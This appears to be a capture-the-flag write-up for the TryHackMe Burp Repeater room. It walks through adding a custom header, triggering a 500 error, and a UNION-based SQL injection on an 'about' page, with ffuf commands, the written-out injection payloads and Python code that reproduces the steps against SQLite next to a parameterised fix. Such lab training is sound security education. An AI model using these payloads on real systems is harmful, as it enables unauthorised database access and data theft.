Introduction

This post covers the basics of Repeater in Burp Suite and walks through an example SQL injection scenario. The material is part of the TryHackMe Jr Penetration Tester pathway.

We will be covering how to use Repeater to manipulate and arbitrarily resend captured requests, as well as looking at some of the niftier options available in this awesome tool. Finally, we will encounter a series of examples, including a real-world, extra-mile exercise which we will use to consolidate the more theoretical aspects of the room.

If you have not used Burp Suite before and have not completed the Burp Basics room, you may wish to do so now before continuing, as this room builds on the foundations covered there.

In short: Burp Suite Repeater allows us to craft and/or relay intercepted requests to a target at will. In layman’s terms, it means we can take a request captured in the Proxy, edit it, and send the same request repeatedly as many times as we wish. Alternatively, we could craft requests by hand, much as we would from the CLI (Command Line Interface), using a tool such as cURL to build and send requests.

This ability to edit and resend the same request multiple times makes Repeater ideal for any kind of manual poking around at an endpoint, providing us with a nice Graphical User Interface (GUI) for writing the request payload and numerous views (including a rendering engine for a graphical view) of the response so that we can see the results of our handiwork in action.

Finding a Flag with a Custom Header

In the first challenge, I had to find a flag by adding a custom HTTP header to my request. I sent a normal request for the main page from the Proxy to Repeater and then added a new header below the existing ones: flag_authorized: true.

A detail that trips people up is the end of the request. In HTTP/1.1 the header block must be terminated by an empty line (the bytes CRLF CRLF after the last header), so after adding a header you must make sure the request still ends with a blank line; in the Repeater editor that means leaving two line breaks after your new header, which the room describes as two blank lines at the very end. Without that terminator the server cannot tell where the headers end and will not process the request as intended. Once the header and the blank line were in place, sending the request returned the flag in the response body.
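The request built by hand, as an added example for this post rather than code from the TryHackMe room: it constructs a raw HTTP/1.1 request with the custom header, shows where the terminating empty line comes from, and parses the result the way a server would so that a request missing the terminator is rejected. The host 10.10.10.10 and the path are placeholders; flag_authorized is the header name from the text.

```python
"""Build a raw HTTP/1.1 request carrying a custom header and check that the
header block is terminated by the empty line Repeater needs. Added example for
this post, not code from the TryHackMe room; the host 10.10.10.10 and the path
are placeholders, and flag_authorized is the header name from the text."""
import socket

CRLF = "\r\n"


def build_request(method, path, host, extra_headers=None):
    """Return the request as bytes with the header block properly terminated."""
    lines = [
        f"{method} {path} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: repeater-demo",
        "Connection: close",
    ]
    for name, value in (extra_headers or {}).items():
        lines.append(f"{name}: {value}")
    # CRLF after the last header line plus one more CRLF produces the empty
    # line that ends the headers; this is the "blank line at the end".
    return (CRLF.join(lines) + CRLF + CRLF).encode()


def header_block_terminated(raw: bytes) -> bool:
    """True when the request contains the CRLF CRLF terminator."""
    return b"\r\n\r\n" in raw


def parse_request(raw: bytes):
    """Parse the request line and headers the way a server would; an
    unterminated header block is an error because the server cannot know
    whether more headers are still coming."""
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("header block is not terminated by an empty line")
    lines = head.decode("ascii").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def send_raw(host, port, raw, timeout=5.0):
    """Replay the raw bytes outside Burp. Not called by demo(), so the file
    runs offline; use it against a lab target only."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(raw)
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def demo():
    good = build_request("GET", "/", "10.10.10.10", {"flag_authorized": "true"})
    # Constructed broken variant: terminator stripped, which is what a missing
    # blank line at the end of the Repeater editor looks like on the wire.
    broken = good.rstrip(b"\r\n") + CRLF.encode()
    request_line, headers = parse_request(good)
    try:
        parse_request(broken)
        broken_parsed = True
    except ValueError:
        broken_parsed = False
    return request_line, headers, broken_parsed
```

demo() returns the parsed request line and headers of the well-formed request and False for the broken variant, showing that the only difference between the two is the final CRLF. send_raw() lets you replay exactly the bytes Repeater would send from a script once the request is right.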

Triggering a 500 Error

The next challenge was to cause a "500 Internal Server Error." I targeted the products page, which used a numerical ID in the URL to identify different products. I tried several approaches: non-existent IDs, special characters, and the web fuzzer ffuf to automate the guessing. None of that worked.

The solution turned out to be simple: entering a negative number (for example -1) as the product ID. The application did not validate the value before using it, so the unexpected input raised an unhandled error, the server answered with a 500, and the error page contained the next flag. The lesson for manual testing is that a numeric parameter deserves its boundary cases as well as garbage: zero, negatives, values just past the known range, integer limits and non-integers should all be on the list.

Fun with SQL Injection

For the final challenge, I targeted the “about” page, which displayed team members based on an ID in the URL. This immediately screamed “SQL database” to me.

  1. Finding the Vulnerability: I started by sending a single apostrophe (') as the ID. This classic trick caused a 500 error and, helpfully, the error message dumped the entire SQL query the server was trying to run. This gave me the table name (people) and a list of column names.
  2. Dumping All Columns: To look for columns the page never displays, I crafted a UNION ALL SELECT whose column count matched the five columns of the leaked query. The first column carried GROUP_CONCAT(column_name) from the information_schema.columns table for the people table and the remaining four were NULL. The result revealed a hidden notes column.
  3. Getting the Flag: I knew the CEO’s ID was 1, and now I knew about the notes column. So, I put together my final SQL injection payload: 0 UNION ALL SELECT notes, NULL, NULL, NULL, NULL FROM people WHERE id = 1. This query tricked the database into returning the contents of the notes column for the CEO instead of the normal information. And, of course, the CEO’s notes contained the final flag.
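The three steps above, reproduced against an in-memory database as an added example for this post (not the room's code). The table layout follows the leaked query described in the text, five displayed columns plus the hidden notes column; SQLite stands in for the room's MySQL backend, so column names are read from pragma_table_info() instead of information_schema.columns and group_concat() replaces GROUP_CONCAT(); the CEO's note and the other rows are constructed sample data. A parameterised version of the same lookup is included for contrast.

```python
"""Reproduce the about-page injection steps against SQLite. Added example
for this post, not the room's code. Assumptions: table layout taken from
the leaked query described in the text plus a notes column; SQLite in place
of MySQL, so pragma_table_info() and group_concat() stand in for
information_schema.columns and GROUP_CONCAT(); all rows are constructed."""
import sqlite3


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE people (
            id INTEGER PRIMARY KEY, firstName TEXT, lastName TEXT,
            pfpLink TEXT, role TEXT, bio TEXT, notes TEXT);
        INSERT INTO people VALUES
          (1, 'Ada', 'Example', '/img/1.png', 'CEO', 'Runs the place',
           'THM{constructed-sample-flag}'),
          (2, 'Bob', 'Example', '/img/2.png', 'CTO', 'Builds the thing', NULL);
        """
    )
    return conn


def about_vulnerable(conn, user_id: str):
    """The vulnerable pattern: the URL value is concatenated into the query."""
    query = ("SELECT firstName, lastName, pfpLink, role, bio "
             f"FROM people WHERE id = {user_id}")
    return conn.execute(query).fetchall()


def about_fixed(conn, user_id: str):
    """Hardened version: validate the type first, then bind the value."""
    if not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute(
        "SELECT firstName, lastName, pfpLink, role, bio FROM people WHERE id = ?",
        (int(user_id),),
    ).fetchall()


def step1_error(conn):
    """A lone apostrophe breaks the query; in the room the error text leaked
    the whole statement. Returns the database error message."""
    try:
        about_vulnerable(conn, "'")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def step2_columns(conn):
    """UNION with five columns to match the original SELECT; the first column
    carries the concatenated column names of the people table."""
    payload = ("0 UNION ALL SELECT group_concat(name), NULL, NULL, NULL, NULL "
               "FROM pragma_table_info('people')")
    return about_vulnerable(conn, payload)[0][0]


def step3_notes(conn):
    """Same payload shape as the text, pulling notes for id 1 into the first
    displayed column."""
    payload = ("0 UNION ALL SELECT notes, NULL, NULL, NULL, NULL "
               "FROM people WHERE id = 1")
    return about_vulnerable(conn, payload)[0][0]
```

The id = 0 prefix makes the original SELECT return no rows, so the only row the page renders is the one the injected SELECT supplies; the NULL padding is what keeps the column count at five. about_fixed() rejects every one of these payloads before the query is built, and would also reject the -1 that crashed the products page.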

Technical Commands

Here are the ffuf commands I ran in my terminal during the second challenge. One flag is corrected from my original invocation: ffuf takes the HTTP method with upper-case -X, while lower-case -x sets a proxy URL. Note also that -fc filters out the listed status codes, so to surface the 500 responses the second run should match them with -mc 500 rather than hide them:

  • ffuf -X GET -w /usr/share/wordlists/seclists/Fuzzing/local_ports.txt -fc 200 -u http://<IP_ADDRESS>/products/FUZZ
  • ffuf -X GET -w /usr/share/wordlists/seclists/Fuzzing/uri_hex.txt -mc 500 -u http://<IP_ADDRESS>/products/FUZZ

TryHackMe Room Answers

  • Which view option displays the response in the same format as your browser would?
  • Send the request. What is the flag you receive?
  • What is the flag you receive when you cause a 500 error in the endpoint?
  • Exploit the union SQL injection vulnerability in the site. What is the flag?

About the Author

Mastermind Study Notes is a group of authors and writers who are experienced across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.